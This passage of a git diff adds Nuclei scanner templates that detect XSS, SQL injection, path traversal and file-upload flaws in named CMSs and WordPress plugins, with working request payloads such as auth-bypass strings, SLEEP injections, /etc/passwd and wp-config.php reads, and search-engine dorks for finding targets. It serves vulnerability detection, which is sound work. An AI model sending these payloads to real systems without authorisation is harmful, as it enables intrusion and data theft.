"{{BaseURL}}preview.php?controller=Load&action=index&catid=moztj%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ems3ea&down_up=a" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, ">") && contains(body, "New Topic")' + - 'contains(content_type, "text/html")' + condition: and diff --git a/http/vulnerabilities/other/indonasia-toko-cms-sql.yaml b/http/vulnerabilities/other/indonasia-toko-cms-sql.yaml new file mode 100644 index 0000000000..cfe6f5786d --- /dev/null +++ b/http/vulnerabilities/other/indonasia-toko-cms-sql.yaml @@ -0,0 +1,35 @@ +id: indonasia-toko-cms-sql + +info: + name: Indonasia Toko CMS - SQL Injection + author: r3Y3r53 + severity: high + description: | + Indonesia Toko CMS is susceptible to SQL Injection in its login system, enabling attackers to exploit vulnerabilities and bypass authentication by injecting malicious SQL code. + reference: + - https://cxsecurity.com/issue/WLB-2019030008 + metadata: + max-request: 1 + verified: true + google-query: inurl:"index.php?mnu=login" + tags: sqli,toko,cms + +http: + - raw: + - | + POST /index.php?mnu=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user=%27+or+1%3D1+limit+1+--+-%2B&pass=%27+or+1%3D1+limit+1+--+-%2B&Login=Login + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "alert('Administrator" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/joomla-jlex-review-xss.yaml b/http/vulnerabilities/other/joomla-jlex-review-xss.yaml new file mode 100644 index 0000000000..a334683cde --- /dev/null +++ b/http/vulnerabilities/other/joomla-jlex-review-xss.yaml @@ -0,0 +1,35 @@ +id: joomla-jlex-xss + +info: + name: Joomla JLex Review 6.0.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + reference: + - https://www.exploitalert.com/view-details.html?id=39732 + - https://www.exploit-db.com/exploits/51645 + - https://extensions.joomla.org/extension/jlex-review/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-1950415971 + tags: joomla,xss + +http: + - method: GET + path: + - "{{BaseURL}}/?review_id=1&itwed%22onmouseover=%22confirm(document.domain)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22b7yzn=1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '")' + condition: and diff --git a/http/vulnerabilities/other/lokomedia-cms-lfi.yaml b/http/vulnerabilities/other/lokomedia-cms-lfi.yaml new file mode 100644 index 0000000000..f4019e490a --- /dev/null +++ b/http/vulnerabilities/other/lokomedia-cms-lfi.yaml @@ -0,0 +1,36 @@ +id: lokomedia-cms-lfi + +info: + name: Lokomedia CMS - LFI Vulnerability + author: r3Y3r53 + severity: high + description: A Local File Inclusion (LFI) vulnerability is a type of security vulnerability that occurs when a web application allows an attacker to include files on the server that should not be accessible. + reference: + - https://cxsecurity.com/issue/WLB-2018070116 + - https://github.com/kangkuswae/CMS-Lokomedia + metadata: + google-query: inurl:/semua-download.html + verified: true + max-request: 1 + tags: lfi,lokomedia,cms + +http: + - method: GET + path: + - "{{BaseURL}}/downlot.php?file=../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/proses" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/news-script-xss.yaml b/http/vulnerabilities/other/news-script-xss.yaml new file mode 100644 index 0000000000..021ce6dd03 --- /dev/null +++ b/http/vulnerabilities/other/news-script-xss.yaml @@ -0,0 +1,26 @@ +id: news-script-xss + +info: + name: News Script Pro 2.4 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + reference: + - https://www.exploitalert.com/view-details.html?id=39634 + metadata: + verified: true + tags: newsscript,xss + +http: + - method: GET + path: + - "{{BaseURL}}/preview.php/mn71q%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ep15vr?cat_id=&p=2" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "News Script PHP Pro", "")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and diff --git a/http/vulnerabilities/other/office-suite-xss.yaml b/http/vulnerabilities/other/office-suite-xss.yaml new file mode 100644 index 0000000000..b8488c3d23 --- /dev/null +++ b/http/vulnerabilities/other/office-suite-xss.yaml @@ -0,0 +1,27 @@ +id: office-suite-xss + +info: + name: Office Suite Premium < 10.9.1.42602 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Office Suite is suffering from an XSS vulnerability in the following parameter /api?path=files&id. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. + reference: + - https://www.exploitalert.com/view-details.html?id=39632 + metadata: + max-request: 1 + verified: true + tags: xss,office,suite + +http: + - method: GET + path: + - "{{BaseURL}}/api?path=files&id=dfsse%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "", "\"payload\":")' + condition: and diff --git a/http/vulnerabilities/other/ozeki-10-sms-gateway.yaml b/http/vulnerabilities/other/ozeki-10-sms-gateway.yaml new file mode 100644 index 0000000000..c26d3e1483 --- /dev/null +++ b/http/vulnerabilities/other/ozeki-10-sms-gateway.yaml @@ -0,0 +1,27 @@ +id: ozeki-10-sms-gateway + +info: + name: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read + author: r3Y3r53 + severity: high + description: | + An arbitrary file read vulnerability, also known as a "path traversal" or "directory traversal" vulnerability, occurs when an attacker is able to access files on a system that they shouldn't have access to. This vulnerability arises from improper input validation or insufficient access controls in an application. + reference: + - https://www.exploit-db.com/exploits/51646 + - https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip + metadata: + verified: true + max-request: 1 + tags: ozeki,lfi,unauth,ozeki + +http: + - method: GET + path: + - "{{BaseURL}}/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "application/octet-stream") && contains(body, "Mail") && contains(body, "files")' + condition: and diff --git a/http/vulnerabilities/other/phuket-cms-sqli.yaml b/http/vulnerabilities/other/phuket-cms-sqli.yaml new file mode 100644 index 0000000000..eeb898f0e7 --- /dev/null +++ b/http/vulnerabilities/other/phuket-cms-sqli.yaml @@ -0,0 +1,33 @@ +id: phuket-cms-sqli + +info: + name: Phuket Solution CMS - SQL Injection + author: r3Y3r53 + severity: high + description: | + Phuket Solutions CMS is vulnerable to sql injection in which an attacker is able to manipulate an SQL query through user input, causing the application to execute unintended SQL code. + reference: + - https://www.exploitalert.com/view-details.html?id=36234 + metadata: + max-request: 2 + google-dork: intext:"Developed by Phuket Solution" + verified: true + tags: phuket,sqli,phuket-cms + +http: + - raw: + - | + GET /properties-list.php HTTP/1.1 + Host: {{Hostname}} + + - | + GET /properties-list.php?property-types=%27 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "You have an error in your SQL syntax") && contains(body_1, "Phuket Solution")' + condition: and diff --git a/http/vulnerabilities/other/phuket-cms-xss.yaml b/http/vulnerabilities/other/phuket-cms-xss.yaml new file mode 100644 index 0000000000..4f648b6bc8 --- /dev/null +++ b/http/vulnerabilities/other/phuket-cms-xss.yaml @@ -0,0 +1,32 @@ +id: phuket-cms-xss + +info: + name: Phuket Solution CMS - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Phuket Solutions CMS is vulnerable to Reflected XSS in which an attacker injects malicious executable scripts into the code of a trusted application or website. + reference: + - https://www.exploitalert.com/view-details.html?id=36234 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + google-query: intext:"Developed by Phuket Solution" + verified: true + tags: xss,phuket,phuket-cms + +http: + - raw: + - | + GET /properties-list.php?property-types=1&types=2&location=&prices=&bedroom=&code=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "") && contains(body, "Phuket Solution")' + condition: and diff --git a/http/vulnerabilities/other/pmb-sqli.yaml b/http/vulnerabilities/other/pmb-sqli.yaml new file mode 100644 index 0000000000..2912f7848c --- /dev/null +++ b/http/vulnerabilities/other/pmb-sqli.yaml @@ -0,0 +1,32 @@ +id: pmb-sqli + +info: + name: PMB <= 7.4.6 - SQL Injection + author: r3Y3r53 + severity: high + description: | + PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs. + reference: + - https://www.exploit-db.com/exploits/51197 + - https://vulners.com/exploitdb/EDB-ID:51197 + metadata: + google-query: inurl:"opac_css" + verified: true + max-request: 1 + tags: sqli,unauth,pmb + +http: + - raw: + - | + @timeout: 15s + GET /pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))SHde)&module=ajax&sub=save&token=undefined HTTP/2 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(content_type, "text/html")' + - 'contains(header, "PmbOpac")' + - 'duration>=5' + - 'status_code == 200' + condition: and diff --git a/http/vulnerabilities/other/rentequip-xss.yaml b/http/vulnerabilities/other/rentequip-xss.yaml new file mode 100644 index 0000000000..f010a8c841 --- /dev/null +++ b/http/vulnerabilities/other/rentequip-xss.yaml @@ -0,0 +1,29 @@ +id: rentequip-xss + +info: + name: RentEquip Multipurpose Rental 1.0 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + reference: + - https://vulners.com/packetstorm/PACKETSTORM:173002 + - https://www.exploitalert.com/view-details.html?id=39611 + - https://codecanyon.net/user/kreativdev/portfolio + metadata: + verified: true + max-request: 1 + tags: xss,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/shop/products?category=cordless-tools&min=1026553%3balert(document.domain)%2f%2f772" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "rentequip") && contains(body, "1026553;alert(document.domain)//772")' + - 'contains(content_type, "text/html")' + condition: and diff --git a/http/vulnerabilities/other/shoowbiz-xss.yaml b/http/vulnerabilities/other/shoowbiz-xss.yaml new file mode 100644 index 0000000000..becb51abb6 --- /dev/null +++ b/http/vulnerabilities/other/shoowbiz-xss.yaml @@ -0,0 +1,28 @@ +id: shoowbiz-xss +info: + name: SHOOWBIZ - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Cross-Site Scripting, is a type of security vulnerability commonly found in web applications. It occurs when an attacker injects malicious scripts (typically written in JavaScript) into web pages viewed by other users. + reference: + - https://www.exploitalert.com/view-details.html?id=36000 + metadata: + max-request: 1 + verified: true + google-drok: inurl:"search.php?q=" + tags: shoowbiz,xss + +http: + - method: GET + path: + - "{{BaseURL}}/search.php?q=%3CScRipT%3Ealert(document.domain);%3C/ScRipT%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "")' + - 'contains(body, "Search result in")' + condition: and diff --git a/http/vulnerabilities/other/sound4-impact-auth-bypass.yaml b/http/vulnerabilities/other/sound4-impact-auth-bypass.yaml new file mode 100644 index 0000000000..94c1bdf7d2 --- /dev/null +++ b/http/vulnerabilities/other/sound4-impact-auth-bypass.yaml @@ -0,0 +1,33 @@ +id: sound4-impact-auth-bypass + +info: + name: SOUND4 IMPACT/FIRST/PULSE/Eco <= 2.x - Authentication Bypass + author: r3Y3r53 + severity: high + description: | + The application suffers from an SQL Injection vulnerability. Input passed through the 'username' POST parameter in 'index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php + metadata: + verified: true + shodan-query: http.favicon.hash:-1548359600 + tags: sqli,zeroscience,sound4,auth-bypass + +http: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=%27%2Bjoxvy--%2Bz&password=ffesdf + + redirects: true + max-redirects: 2 + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(body, "Network Diagnostic:", "disconnect the user")' + condition: and diff --git a/http/vulnerabilities/other/sound4-impact-password-auth-bypass.yaml b/http/vulnerabilities/other/sound4-impact-password-auth-bypass.yaml new file mode 100644 index 0000000000..8794745e15 --- /dev/null +++ b/http/vulnerabilities/other/sound4-impact-password-auth-bypass.yaml @@ -0,0 +1,35 @@ +id: sound4-password-auth-bypass + +info: + name: Sound4 IMPACT/FIRST/PULSE/Eco <=2.x - Authentication Bypass + author: r3Y3r53 + severity: high + description: | + The application suffers from an SQL Injection vulnerability. Input passed through the 'password' POST parameter in 'index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"SOUND4" + tags: sound4,auth-bypass,sqli,misconfig + +http: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=test&password=%27%2Bjoxy--%2Bz + + host-redirects: true + max-redirects: 2 + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(body, "SOUND4 PULSE", "Network Diagnostic", "Disconnect")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and diff --git a/http/vulnerabilities/other/stackposts-sqli.yaml b/http/vulnerabilities/other/stackposts-sqli.yaml new file mode 100644 index 0000000000..2bd630bda7 --- /dev/null +++ b/http/vulnerabilities/other/stackposts-sqli.yaml @@ -0,0 +1,36 @@ +id: stackposts-sqli + +info: + name: Stackposts Social Marketing Tool v1.0 - SQL Injection + author: r3Y3r53 + severity: high + description: | + SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries. + reference: + - https://www.exploit-db.com/exploits/51473 + - https://vulners.com/zdt/1337DAY-ID-38725 + - https://codecanyon.net/item/stackposts-social-marketing-tool/21747459 + metadata: + verified: true + max-request: 1 + shodan-query: html:"stackposts" + tags: sqli,unauth,stackposts + +http: + - raw: + - | + @timeout: 15s + POST /spre/auth/login HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + username=1')AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg&password=test + + matchers: + - type: dsl + dsl: + - 'duration>=5' + - 'contains(content_type, "text/html")' + - 'contains(body, "account you entered")' + - 'status_code == 200' + condition: and diff --git a/http/vulnerabilities/other/taiwanese-travel-lfi.yaml b/http/vulnerabilities/other/taiwanese-travel-lfi.yaml new file mode 100644 index 0000000000..ea004215e6 --- /dev/null +++ b/http/vulnerabilities/other/taiwanese-travel-lfi.yaml @@ -0,0 +1,35 @@ +id: taiwanese-travel-lfi + +info: + name: Taiwanese Travel - Local File Inclusion + author: r3Y3r53 + severity: high + description: | + The vulnerability in '/index.php?page=' allows for Local File Inclusion (LFI), granting attackers the ability to include and potentially execute files on the server, compromising the application's security + reference: + - https://www.exploitalert.com/view-details.html?id=35607 + metadata: + google-query: intext:"COPYRIGHT" inurl:?page=regulation.php + verified: true + max-request: 1 + tags: lfi,unauth,taiwanese + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?page=/etc/passwd" + + matchers: + - type: regex + part: body + regex: + - "root:x:0:0:" + + - type: word + part: body + words: + - "travel" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/talroo-jobs-xss.yaml b/http/vulnerabilities/other/talroo-jobs-xss.yaml new file mode 100644 index 0000000000..9c020487b9 --- /dev/null +++ b/http/vulnerabilities/other/talroo-jobs-xss.yaml @@ -0,0 +1,29 @@ +id: talroo-jobs-xss + +info: + name: Talroo Jobs Script 1.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + reference: + - https://packetstormsecurity.com/files/173043/Talroo-Jobs-Script-1.0-Cross-Site-Scripting.html + - https://www.exploitalert.com/view-details.html?id=39619 + - https://www.netartmedia.net/talroo-jobs + metadata: + verified: true + max-request: 1 + tags: xss,unauth,talroo + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?page=jobs&category=1&lrw3e%22onmouseover=%22confirm(document.domain)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22k1n44=1" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Talroo Jobs") && contains(body, "confirm(document.domain)")' + - 'contains(content_type, "text/html")' + condition: and diff --git a/http/vulnerabilities/other/webigniter-xss.yaml b/http/vulnerabilities/other/webigniter-xss.yaml new file mode 100644 index 0000000000..17cf910dbb --- /dev/null +++ b/http/vulnerabilities/other/webigniter-xss.yaml @@ -0,0 +1,39 @@ +id: webigniter-xss + +info: + name: Webigniter 28.7.23 - Cross-Site Scripting + author: theamanrawat + severity: medium + description: | + The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ycsz3">bn76w was submitted in the redirect parameter. This input was echoed unmodified in the application's response. By using this Java Script injection, the attacker can trick a lot of users into visiting his dangerous URL which is reflected on the login form, before they log in, warning them that there is a problem with the login + reference: + - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-XSS-Reflected + - https://webigniter.net + metadata: + verified: true + tags: xss,webigniter + +http: + - method: GET + path: + - '{{BaseURL}}/cms/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w' + - '{{BaseURL}}/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "Webigniter" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/wordpress/knr-widget-xss.yaml b/http/vulnerabilities/wordpress/knr-widget-xss.yaml new file mode 100644 index 0000000000..9a6778de1f --- /dev/null +++ b/http/vulnerabilities/wordpress/knr-widget-xss.yaml @@ -0,0 +1,41 @@ +id: knr-widget-xss + +info: + name: KNR Author List Widget - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + KNR Author List Widget suffers from Cross-site Scripting (XSS) in the listItem[] parameter. + reference: + - https://wordpress.org/plugins/knr-author-list-widget/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + max-request: 1 + verified: true + tags: xss,knr-author-list-widget,wordpress,wp,wp-plugin + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php?listItem[]=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'item: ' + - 'Saved on' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml b/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml new file mode 100644 index 0000000000..58150eb07e --- /dev/null +++ b/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml @@ -0,0 +1,33 @@ +id: photoblocks-grid-gallery-xss + +info: + name: Gallery Photoblocks < 1.1.41 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Reflected Cross-Site Scripting (XSS) is a type of web vulnerability where an attacker injects malicious scripts into a website, and the injected code gets reflected back to the user's browser, executing the script in the context of the vulnerable website. + remediation: Fixed in version 1.1.41 + reference: + - https://plugins.trac.wordpress.org/changeset/2117972 + - https://wpscan.com/vulnerability/5c57e78a-97b9-4e23-8935-e4c9d806c89d + - https://wordpress.org/plugins/photoblocks-grid-gallery/ + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" + tags: wordpress,wpscan,photoblocks,wp-plugin,wp,xss + +http: + - raw: + - | + GET /wp-content/plugins/photoblocks-grid-gallery/admin/partials/photoblocks-edit.php?id=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "")' + - 'contains(body, "PhotoBlocks")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml b/http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml new file mode 100644 index 0000000000..04415e2018 --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml @@ -0,0 +1,30 @@ +id: wp-adivaha-sqli + +info: + name: WordPress adivaha Travel Plugin 2.3 - SQL Injection + author: theamanrawat + severity: high + description: | + An unauthenticated Time-Based SQL injection found in adivaha Travel Plugin 2.3 allows a remote attacker to retrieve the contents of an entire database. + reference: + - https://wordpress.org/plugins/adiaha-hotel/ + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/adiaha-hotel/" + tags: sqli,adivaha,wordpress,wp,wp-plugin + +http: + - raw: + - | + @timeout: 25s + GET /mobile-app/v3/?pid='+AND+(SELECT+6398+FROM+(SELECT(SLEEP(7)))zoQK)+AND+'Zbtn'='Zbtn&isMobile=chatbot HTTP/2 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - duration>=7 + - status_code == 200 + - contains(body, "adivaha") + condition: and diff --git a/http/vulnerabilities/wordpress/wp-adivaha-xss.yaml b/http/vulnerabilities/wordpress/wp-adivaha-xss.yaml new file mode 100644 index 0000000000..dff4a4e906 --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-adivaha-xss.yaml @@ -0,0 +1,26 @@ +id: wp-adivaha-xss + +info: + name: WordPress Adivaha Travel Plugin 2.3 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials + reference: + - https://www.exploit-db.com/exploits/51663 + metadata: + verified: true + tags: wordpress,wp,wp-plugin,xss,adivaha,travel + +http: + - method: GET + path: + - "{{BaseURL}}/mobile-app/v3/?pid=77A89299&isMobile=%20clq95%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Elb1ra" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "", "travelpayout_flight")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-ellipsis-xss.yaml b/http/vulnerabilities/wordpress/wp-ellipsis-xss.yaml new file mode 100644 index 0000000000..3267fc0c95 --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-ellipsis-xss.yaml @@ -0,0 +1,31 @@ +id: wp-ellipsis-xss + +info: + name: Ellipsis Human Presence Technology <= 2.0.8 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + The 'page' GET parameter of the inc/protected-forms-table.php file was affected by a reflected XSS vulnerability. + reference: + - https://wpscan.com/vulnerability/c0a138d8-93ac-463c-b650-d849352c0b44 + - https://packetstormsecurity.com/files/154393/ + - https://wordpress.org/plugins/ellipsis-human-presence-technology/ + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/ellipsis-human-presence-technology/" + tags: wordpress,wpscan,wp-plugin,ellipsis-human-presence-technology,xss + +http: + - raw: + - | + GET /wp-content/plugins/ellipsis-human-presence-technology/inc/protected-forms-table.php?&page=%22%20%3E%3Cscript%3Ealert(document.location)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "") && contains(body, "protected-forms-table")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml b/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml new file mode 100644 index 0000000000..7a3f610b80 --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml @@ -0,0 +1,48 @@ +id: wp-gallery-file-upload + +info: + name: WordPress Plugin Gallery 3.06 - Arbitrary File Upload + author: r3Y3r53 + severity: high + description: | + The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability. + remediation: Fixed in version 3.1.1 + reference: + - https://www.exploit-db.com/exploits/18998 + - http://wordpress.org/extend/plugins/gallery-plugin/ + - http://downloads.wordpress.org/plugin/gallery-plugin.3.06.zip + - https://wpscan.com/vulnerability/049c8518-1f52-4aa4-b0b3-218289727353 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/gallery-plugin/" + google-query: inurl:/wp-content/plugins/gallery-plugin/ + tags: wp,wp-plugin,wordpress,wpscan,file-upload,intrusive + +variables: + filename: "{{to_lower(rand_text_alpha(5))}}" + +http: + - raw: + - | + POST /wp-content/plugins/gallery-plugin/upload/php.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=WebKitFormBoundary20kgW2hEKYaeF5iP + + --WebKitFormBoundary20kgW2hEKYaeF5iP + Content-Disposition: form-data; name="qqfile"; filename="{{filename}}.png" + + {{randstr}} + + --WebKitFormBoundary20kgW2hEKYaeF5iP-- + + - | + GET /wp-content/plugins/gallery-plugin/upload/files/{{filename}}.png HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(content_type_1, "text/html") && contains(content_type_2, "image/png")' + - 'contains(body_1, "success:true") && contains(body_2, "{{randstr}}")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-googlemp3-lfi.yaml b/http/vulnerabilities/wordpress/wp-googlemp3-lfi.yaml new file mode 100644 index 0000000000..ad4dcc6666 --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-googlemp3-lfi.yaml @@ -0,0 +1,41 @@ +id: wp-googlemp3-lfi + +info: + name: WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download + author: theamanrawat + severity: critical + description: | + WordPress Plugin CodeArt Google MP3 Player allows an unauthenticated attacker to download file from server. + reference: + - https://www.exploit-db.com/exploits/35460 + - https://wordpress.org/plugins/google-mp3-audio-player/ + metadata: + verified: "true" + max-request: 1 + publicwww-query: "/wp-content/plugins/google-mp3-audio-player/" + tags: wp-plugin,wp,wordpress,lfi,google-mp3-audio-player,unauth,disclosure + +http: + - raw: + - | + GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../wp-config.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_USER" + - "DB_PASSWORD" + - "DB_HOST" + condition: and + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/wordpress/wp-mega-theme.yaml b/http/vulnerabilities/wordpress/wp-mega-theme.yaml new file mode 100644 index 0000000000..e6e52f60ee --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-mega-theme.yaml @@ -0,0 +1,29 @@ +id: wp-mega-theme + +info: + name: Mega Wordpress Theme - Cross site scripting + author: r3Y3r53 + severity: medium + description: | + WordPress theme with a 'Mega-Theme' design is vulnerable to a reflected XSS attack through the '?s=' parameter. + reference: + - https://cxsecurity.com/issue/WLB-2021120027 + - https://www.zhaket.com/web/megawp-wordpress-theme + metadata: + google-query: Megawp-Theme + verified: true + max-request: 1 + tags: wp,wp-theme,wordpress,xss,mega + +http: + - method: GET + path: + - "{{BaseURL}}/?s=%22%3E%3Cscript%3Ealert(`document.domain`)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "script>alert(`document.domain`)</script") && contains(body, "mega-theme")' + condition: and diff --git a/http/vulnerabilities/wordpress/wp-portrait-archiv-xss.yaml b/http/vulnerabilities/wordpress/wp-portrait-archiv-xss.yaml new file mode 100644 index 0000000000..1b532ffec5 --- /dev/null +++ b/http/vulnerabilities/wordpress/wp-portrait-archiv-xss.yaml @@ -0,0 +1,31 @@ +id: wp-portrait-archiv-xss + +info: + name: WordPress Portrait-Archiv.com Photostore 5.0.4 - Reflected Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + The 'pDetails' GET parameter from the js/imageDetails.php was vulnerable to an unauthenticated reflected XSS attack. + reference: + - https://wpscan.com/vulnerability/c6a8757e-41ef-4c20-8c7d-97b57d56fe0e + - https://wordpress.org/plugins/portrait-archiv-shop/ + - https://packetstormsecurity.com/files/154343/ + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/plugins/portrait-archiv-shop/" + tags: wordpress,wpscan,wp-plugin,wp,portrait-archiv-shop,xss + +http: + - raw: + - | + GET /wp-content/plugins/portrait-archiv-shop/js/imageDetails.php?pDetails=);});%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E 